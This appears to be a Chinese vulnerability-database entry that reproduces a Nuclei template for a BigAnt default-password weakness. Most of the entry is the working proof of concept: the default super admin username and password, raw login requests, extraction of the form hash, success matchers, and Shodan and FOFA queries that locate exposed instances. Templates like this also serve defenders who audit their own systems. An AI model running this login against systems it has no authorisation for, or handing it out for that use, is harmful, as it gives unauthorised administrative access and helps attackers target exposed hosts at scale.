bigant-default-login: BigAnt - Default Password

日期: 2025-08-01 | 影响软件: BigAnt | POC: 已公开

漏洞描述

Misconfiguratoin leads to Default Login into BigAnt Super Admin Account.

PoC代码[已公开]

id: bigant-default-login

info:
  name: BigAnt - Default Password
  author: ritikchaddha
  severity: critical
  description: |
    Misconfiguratoin leads to Default Login into BigAnt Super Admin Account.
  reference:
    - https://www.bigantsoft.com/support/faq/2-4_How_to_switch_login_accounts_System_admin_Security_admin_Audit_admin_super_admin.html#:~:text=How%2Dto-,How%20to%20switch%20login%20accounts%3A%20System%20admin%2FSecurity%20admin%2F,password%20is%20123456%20by%20default.
  classification:
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"BigAnt"
    fofa-query: title="BigAnt"
  tags: default-login,bigant,vuln

variables:
  username: "superadmin"
  password: "123456"

http:
  - raw:
      - |
        GET /index.php/Home/login/index.html HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php/Home/Login/login_post.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        saas=default&account={{username}}&password={{base64(password)}}&to=admin&app=&__hash__={{hash}}&__hash__={{hash}}&submit=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "Login Successfully! Loading..."
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: hash
        group: 1
        regex:
          - 'name="__hash__" content="([0-9a-z_]+)"'
        internal: true
# digest: 4a0a004730450221008f40707a1299194ff05324b0141d0db91aa2ff4d804c443e028e1a8e6c3fd97f022022fbbc63c2dd8d23a85d5dc81fa35ba5202e31607257113635a2b2d30a67b706:922c64590222798bb761d5b6d8e72950

相关漏洞推荐